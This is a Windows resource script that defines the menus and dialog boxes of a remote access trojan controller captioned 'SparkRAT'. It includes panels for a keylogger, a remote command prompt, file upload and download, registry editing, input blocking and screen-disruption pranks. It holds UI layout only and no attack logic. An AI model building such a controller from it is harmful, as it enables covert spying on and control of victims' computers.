/* All resources hand written */
#include "resource.h"
#include <afxres.h>

/* For visual theming */
CREATEPROCESS_MANIFEST_RESOURCE_ID RT_MANIFEST "RatClient.exe.manifest"

IDI_MAIN ICON DISCARDABLE "main.ico"
IDI_GO ICON DISCARDABLE "rightarrow.ico"

IDR_MENU MENU DISCARDABLE
BEGIN
    POPUP "&File"
    BEGIN
        MENUITEM "Quit\tAlt+F4", IDR_FILE_QUIT
    END

    POPUP "&Help"
    BEGIN
        MENUITEM "About", IDR_HELP_ABOUT
    END
END


DLG_MAIN DIALOGEX 6, 5, 225, 225
CAPTION "SparkRAT"
FONT 10, "Comic Sans MS", 0, 0, 1
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU | WS_MINIMIZEBOX
BEGIN
    LTEXT "Host:", IDC_STATIC,                          10, 6, 30, 12
    EDITTEXT IDC_EDT_HOST,                              40, 5, 90, 11, ES_AUTOHSCROLL
    DEFPUSHBUTTON "Connect", IDC_BTN_CONNECT,           136, 4, 44, 13
    PUSHBUTTON "Verify", IDC_BTN_VERIFY,                140, 18, 36, 10
    LTEXT "Port:", IDC_STATIC,                          10, 21, 30, 12
    EDITTEXT IDC_EDT_PORT,                              40, 19, 40, 11, ES_AUTOHSCROLL
    EDITTEXT IDC_EDT_STATUS,                            10, 40, 167, 11, ES_READONLY
    PUSHBUTTON "Beep", IDC_BTN_BEEP,                    10, 60, 40, 15
    PUSHBUTTON "Message", IDC_BTN_MESSAGE,              10, 80, 40, 15
    PUSHBUTTON "CMD", IDC_BTN_CMD,                      10, 100, 40, 15
    PUSHBUTTON "Run", IDC_BTN_RUN,                      10, 120, 40, 15
    PUSHBUTTON "Shutdown", IDC_BTN_SHUTDOWN,            10, 140, 40, 15
    PUSHBUTTON "Monitor", IDC_BTN_MONITOR,              60, 60, 40, 15
    PUSHBUTTON "Registry", IDC_BTN_REG,                 60, 80, 40, 15
    PUSHBUTTON "Keylogger", IDC_BTN_KEY,                60, 100, 40, 15
    PUSHBUTTON "Kill Process", IDC_BTN_KILLPROC,        60, 120, 40, 15
    PUSHBUTTON "Files", IDC_BTN_FILES,                  60, 140, 40, 15
    PUSHBUTTON "Fun", IDC_BTN_FUN,                      110, 60, 40, 15
    PUSHBUTTON "Block Web.", IDC_BTN_BLOCKWEB,          110, 80, 40, 15
    PUSHBUTTON "Voice", IDC_BTN_VOICE,                  110, 100, 40, 15
    PUSHBUTTON "Chat", IDC_BTN_CHAT,                    110, 120, 40, 15
    PUSHBUTTON "Display", IDC_BTN_DISPLAY,              110, 140, 40, 15
    PUSHBUTTON "Printer", IDC_BTN_PRINT,                160, 60, 40, 15
    PUSHBUTTON "Uninstall", IDC_BTN_UNINST,             160, 140, 40, 15
    PUSHBUTTON "Configure Server", IDC_BTN_SERVER,      80, 158, 60, 15
END

//=======================================

DLG_MSG DIALOG DISCARDABLE 0, 0, 150, 125
CAPTION "MessageBox"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    LTEXT "Message:", IDC_STATIC,                       7, 5, 30, 12
    EDITTEXT DLG_MSG_IDC_EDT_MSG,                       45, 4, 75, 11, ES_AUTOHSCROLL
    LTEXT "Title:", IDC_STATIC,                         7, 26, 30, 12
    EDITTEXT DLG_MSG_IDC_EDT_TITLE,                     45, 25, 75, 11
    LTEXT "Button(s):", IDC_STATIC,                     7, 46, 30, 12
    COMBOBOX DLG_MSG_IDC_CMB_TYPE,                      45, 45, 75, 51, CBS_DROPDOWNLIST
    LTEXT "Icon:", IDC_STATIC,                          7, 66, 30, 12
    COMBOBOX DLG_MSG_IDC_CMB_ICON,                      45, 65, 75, 51, CBS_DROPDOWNLIST
    CHECKBOX "Retrieve result", DLG_MSG_IDC_CHK_RESULT, 7, 86, 70, 12
    DEFPUSHBUTTON "Send", DLG_MSG_IDC_BTN_SEND,         55, 101, 40, 15
END

//=======================================

DLG_BEEP DIALOG DISCARDABLE 0, 0, 100, 75
CAPTION "Beep"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    LTEXT "Frequency:", IDC_STATIC,                     7, 5, 33, 12
    EDITTEXT DLG_BEEP_IDC_EDT_FREQ,                     45, 4, 50, 11, ES_AUTOHSCROLL
    LTEXT "Duration:", IDC_STATIC,                      7, 25, 33, 12
    EDITTEXT DLG_BEEP_IDC_EDT_DUR,                      45, 24, 50, 11, ES_AUTOHSCROLL
    DEFPUSHBUTTON "Send", DLG_BEEP_IDC_BTN_SEND,        30, 46, 40, 15
END

//=======================================

DLG_CMD DIALOG DISCARDABLE 0, 0, 125, 85
CAPTION "CommandPrompt"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    LTEXT "Command:", IDC_STATIC,                       7, 5, 33, 12
    EDITTEXT DLG_CMD_IDC_EDT_CMD,                       45, 4, 75, 11, ES_AUTOHSCROLL
    CHECKBOX "Hide Console", DLG_CMD_IDC_CHK_HIDE,      7, 25, 75, 12
    CHECKBOX "Pause Afterwards", DLG_CMD_IDC_CHK_PAUSE, 7, 41, 75, 12
    DEFPUSHBUTTON "Send", DLG_CMD_IDC_BTN_SEND,         42, 59, 40, 15
END

//=======================================

DLG_RUN DIALOG DISCARDABLE 0, 0, 125, 20
CAPTION "Run"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    EDITTEXT DLG_RUN_IDC_EDT_RUN,                       5, 5, 90, 11, ES_AUTOHSCROLL
    DEFPUSHBUTTON "Run", DLG_RUN_IDC_BTN_RUN,           97, 4, 25, 12
END

//=======================================

DLG_SHUTDOWN DIALOG DISCARDABLE 0, 0, 150, 125
CAPTION "Shutdown"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    GROUPBOX "Function", IDC_STATIC,                        5, 5, 140, 25
    RADIOBUTTON "Shutdown", DLG_SHUTDOWN_IDC_RDO_DOWN,      17, 15, 40, 11
    RADIOBUTTON "Restart", DLG_SHUTDOWN_IDC_RDO_RES,        59, 15, 37, 11
    RADIOBUTTON "Logoff", DLG_SHUTDOWN_IDC_RDO_LOGOFF,      97, 15, 40, 11
    LTEXT "Time(Seconds):", IDC_STATIC,                     5, 40, 50, 12
    EDITTEXT DLG_SHUTDOWN_IDC_EDT_TIME,                     60, 39, 35, 11, ES_AUTOHSCROLL
    LTEXT "Reason:", IDC_STATIC,                            5, 60, 35, 12
    EDITTEXT DLG_SHUTDOWN_IDC_EDT_REASON,                   60, 59, 85, 11, ES_AUTOHSCROLL
    DEFPUSHBUTTON "Send", DLG_SHUTDOWN_IDC_BTN_SEND,        52, 88, 40, 15
END

//=======================================

DLG_MON DIALOG DISCARDABLE 0, 0, 150, 125
CAPTION "Monitor"
FONT 11, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    GROUPBOX "Turn Monitor", IDC_STATIC,                    5, 5, 140, 25
    RADIOBUTTON "Off", DLG_MON_IDC_RDO_OFF,                 42, 15, 25, 11
    RADIOBUTTON "On", DLG_MON_IDC_RDO_ON,                   82, 15, 25, 11
    LTEXT "Number of Times:", IDC_STATIC,                   20, 40, 70, 12
    EDITTEXT DLG_MON_IDC_EDT_TIMES,                         105, 39, 20, 11, ES_AUTOHSCROLL
    LTEXT "For how long? (seconds):", IDC_STATIC,           20, 60, 110, 12
    EDITTEXT DLG_MON_IDC_EDT_SECONDS,                       105, 59, 20, 11, ES_AUTOHSCROLL
    LTEXT "Interval(seconds):", IDC_STATIC,                 20, 80, 90, 12
    EDITTEXT DLG_MON_IDC_EDT_INTERVAL,                      105, 79, 20, 11, ES_AUTOHSCROLL
    DEFPUSHBUTTON "Send", DLG_MON_IDC_BTN_SEND,             56, 100, 40, 15
END

//=======================================

DLG_REG DIALOG DISCARDABLE 0, 0, 375, 245
CAPTION "Registry"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    LTEXT "Hive:", IDC_STATIC,                              5, 5, 15, 12
    COMBOBOX DLG_REG_IDC_CMB_HIVE,                          35, 4, 175, 65, CBS_DROPDOWNLIST
    LTEXT "Sub-key:", IDC_STATIC,                           5, 25, 30, 12
    EDITTEXT DLG_REG_IDC_EDT_KEY,                           35, 24, 175, 11, ES_AUTOHSCROLL
    PUSHBUTTON "Load Key", DLG_REG_IDC_BTN_QUERY,           100, 40, 40, 15
    //-------------
    LTEXT "Values", IDC_STATIC,                             288, 5, 25, 15
    LISTBOX DLG_REG_IDC_LST_VALUES,                         225, 24, 148, 216,
                                                            LBS_NOINTEGRALHEIGHT | LBS_SORT | LBS_DISABLENOSCROLL
                                                            | WS_VSCROLL | WS_TABSTOP
    //-------------Add section
    GROUPBOX "Add Value", IDC_STATIC,                       5, 125, 215, 115
    LTEXT "Hive:", IDC_STATIC,                              10, 137, 80, 12
    COMBOBOX DLG_REG_IDC_CMB_ADDHIVE,                       45, 136, 165, 65, CBS_DROPDOWNLIST
    LTEXT "Sub-key:", IDC_STATIC,                           10, 152, 40, 12
    EDITTEXT DLG_REG_IDC_EDT_ADDSUBKEY,                     45, 151, 165, 11, ES_AUTOHSCROLL
    LTEXT "Name:", IDC_STATIC,                              10, 167, 40, 12
    EDITTEXT DLG_REG_IDC_EDT_ADDNAME,                       45, 166, 165, 11, ES_AUTOHSCROLL
    LTEXT "Value:", IDC_STATIC,                             10, 182, 40, 12
    EDITTEXT DLG_REG_IDC_EDT_ADDVAL,                        45, 181, 165, 11, ES_AUTOHSCROLL
    LTEXT "Type:", IDC_STATIC,                              10, 196, 40, 12
    COMBOBOX DLG_REG_IDC_CMB_ADDTYPE,                       45, 195, 165, 100, CBS_DROPDOWNLIST
    PUSHBUTTON "Add Value", DLG_REG_IDC_BTN_ADD,            90, 215, 40, 15
    //-------------
    LTEXT "Value Type:", IDC_STATIC,                        5, 65, 50, 12
    EDITTEXT DLG_REG_IDC_EDT_TYPE,                          50, 64, 170, 12, ES_READONLY
    LTEXT "Value Data:", IDC_STATIC,                        5, 85, 50, 12
    EDITTEXT DLG_REG_IDC_EDT_DATA,                          50, 84, 170, 11, ES_AUTOHSCROLL
    PUSHBUTTON "Apply Changes", DLG_REG_IDC_BTN_EDITVAL,    55, 105, 55, 15
    PUSHBUTTON "Delete Value", DLG_REG_IDC_BTN_DELVAL,      115, 105, 55, 15

END

//=======================================

DLG_KEY DIALOG DISCARDABLE 0, 0, 100, 55
CAPTION "Keylogger"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    DEFPUSHBUTTON "Start", DLG_KEY_IDC_BTN_START,           27, 10, 45, 15
    PUSHBUTTON "Retrieve Log", DLG_KEY_IDC_BTN_GETLOG,      27, 30, 45, 15
END

//=======================================

DLG_KILL DIALOG DISCARDABLE 0, 0, 125, 20
CAPTION "Kill Process"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    EDITTEXT DLG_KILL_IDC_EDT_PROC,                     5, 5, 90, 11, ES_AUTOHSCROLL
    DEFPUSHBUTTON "Kill", DLG_KILL_IDC_BTN_KILL,        97, 4, 25, 12
END

//=======================================

DLG_FILES DIALOG DISCARDABLE 0, 0, 330, 225
CAPTION "Files"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    DEFPUSHBUTTON "Find Drives", DLG_FILES_IDC_BTN_DRIVES,  5, 5, 40, 12
    COMBOBOX DLG_FILES_IDC_CMB_DRIVES,                      50, 5, 50, 75, CBS_DROPDOWNLIST
    EDITTEXT DLG_FILES_IDC_EDT_PATH,                        105, 5, 200, 11, ES_AUTOHSCROLL
    PUSHBUTTON "", DLG_FILES_IDC_BTN_GO,                    306, 3, 19, 15, BS_ICON
    CTEXT "Directories", IDC_STATIC,                        40, 25, 40, 12
    LISTBOX DLG_FILES_IDC_LST_DIRS,                         5, 35, 115, 185, LBS_NOINTEGRALHEIGHT |
                                                            LBS_SORT | LBS_DISABLENOSCROLL |
                                                            WS_VSCROLL | WS_TABSTOP
    CTEXT "Files", IDC_STATIC,                              175, 25, 40, 12
    LISTBOX DLG_FILES_IDC_LST_FILES,                        140, 35, 115, 185, LBS_NOINTEGRALHEIGHT |
                                                            LBS_SORT | LBS_DISABLENOSCROLL |
                                                            WS_VSCROLL | WS_TABSTOP
    PUSHBUTTON "Download", DLG_FILES_IDC_BTN_DOWNLOAD,      270, 55, 50, 15
    PUSHBUTTON "Upload", DLG_FILES_IDC_BTN_UPLOAD,          270, 85, 50, 15
END

//=======================================

DLG_FUN DIALOG DISCARDABLE 0, 0, 151, 100
CAPTION "Fun"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    PUSHBUTTON "Crazy Mouse", DLG_FUN_IDC_BTN_CMOUSE,               20, 5, 80, 15
    PUSHBUTTON "Stop", DLG_FUN_IDC_BTN__CMOUSE,                     100, 5, 30, 15
    PUSHBUTTON "Hide Start Button", DLG_FUN_IDC_BTN_START,          20, 20, 80, 15
    PUSHBUTTON "Fix", DLG_FUN_IDC_BTN__START,                       100, 20, 30, 15
    PUSHBUTTON "Hide Task Bar", DLG_FUN_IDC_BTN_TASKBAR,            20, 35, 80, 15
    PUSHBUTTON "Fix", DLG_FUN_IDC_BTN__TASKBAR,                     100, 35, 30, 15
    PUSHBUTTON "Open CD Tray", DLG_FUN_IDC_BTN_CDTRAY,              20, 50, 80, 15
    PUSHBUTTON "Close", DLG_FUN_IDC_BTN__CDTRAY,                    100, 50, 30, 15
    PUSHBUTTON "Block Input", DLG_FUN_IDC_BTN_BLOCK,                20, 65, 80, 15
    PUSHBUTTON "Fix", DLG_FUN_IDC_BTN__BLOCK,                       100, 65, 30, 15
    PUSHBUTTON "Set Start Button Text", DLG_FUN_IDC_BTN_TEXT,       20, 80, 80, 15
    EDITTEXT DLG_FUN_IDC_EDT_TEXT,                                  100, 82, 30, 11, ES_AUTOHSCROLL
END

//=======================================

DLG_BLOCKWEB DIALOG DISCARDABLE 0, 0, 175, 20
CAPTION "BlockWebsite"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    LTEXT "Website:", IDC_STATIC,                                   5, 5, 30, 12
    EDITTEXT DLG_BLOCKWEB_IDC_EDT_WEB,                              40, 4, 95, 11, ES_AUTOHSCROLL
    DEFPUSHBUTTON "Block", DLG_BLOCKWEB_IDC_BTN_BLOCK,              143, 3, 25, 12
END

//=======================================

DLG_VOICE DIALOG DISCARDABLE 0, 0, 175, 47
CAPTION "Voice"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    LTEXT "Phrase to speak:", IDC_STATIC,           5, 5, 55, 12
    EDITTEXT DLG_VOICE_IDC_EDT_PHRASE,              65, 4, 104, 11, ES_AUTOHSCROLL
    DEFPUSHBUTTON "Send", DLG_VOICE_IDC_BTN_SEND,   70, 23, 40, 15
END

//=======================================
DLG_CHAT DIALOG DISCARDABLE 0, 0, 175, 125
CAPTION "Chat"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    LISTBOX DLG_CHAT_IDC_LST_CHAT,                  5, 5, 165, 95, LBS_NOINTEGRALHEIGHT | LBS_DISABLENOSCROLL
                                                            | WS_VSCROLL | WS_HSCROLL | WS_TABSTOP
    EDITTEXT DLG_CHAT_IDC_EDT_SAY,                  5, 106, 130, 11, ES_AUTOHSCROLL
    DEFPUSHBUTTON "Say", DLG_CHAT_IDC_BTN_SEND,     137, 105, 36, 13
END

//=======================================
DLG_DISP DIALOG DISCARDABLE 0, 0, 125, 75
CAPTION "Display Melting"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    CHECKBOX "Reverse pixels (bitwise)", DLG_DISP_IDC_CHK_BWREVERSE,    5, 5, 120, 12
    LTEXT "Pixel shift range:", IDC_STATIC,                             5, 23, 90, 12
    EDITTEXT DLG_DISP_IDC_EDT_RANGE,                                    60, 22, 30, 11
    DEFPUSHBUTTON "Test", DLG_DISP_IDC_BTN_TEST,                        8, 45, 40, 15
    DEFPUSHBUTTON "Send", DLG_DISP_IDC_BTN_MELT,                        78, 45, 40, 15
END

//=======================================
DLG_PRINT DIALOG DISCARDABLE 0, 0, 175, 125
CAPTION "Printer"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    LTEXT "What to print:", IDC_STATIC,             5, 4, 75, 12
    EDITTEXT DLG_PRINT_IDC_EDT_TEXT,                5, 15, 164, 85
    DEFPUSHBUTTON "Print", DLG_PRINT_IDC_BTN_PRINT, 67, 105, 40, 15
END


//=======================================

DLG_UNINST DIALOG DISCARDABLE 0, 0, 130, 46
CAPTION "Uninstall"
FONT 10, "Comic Sans MS"
STYLE DS_MODALFRAME | DS_CENTER | WS_POPUP | WS_SYSMENU
BEGIN
    PUSHBUTTON "Uninstall Local Server", DLG_UNINST_IDC_BTN_LOCAL,    5, 5, 120, 15
    PUSHBUTTON "Uninstall Remote Server", DLG_UNINST_IDC_BTN_REMOTE,  5, 25, 120, 15
END
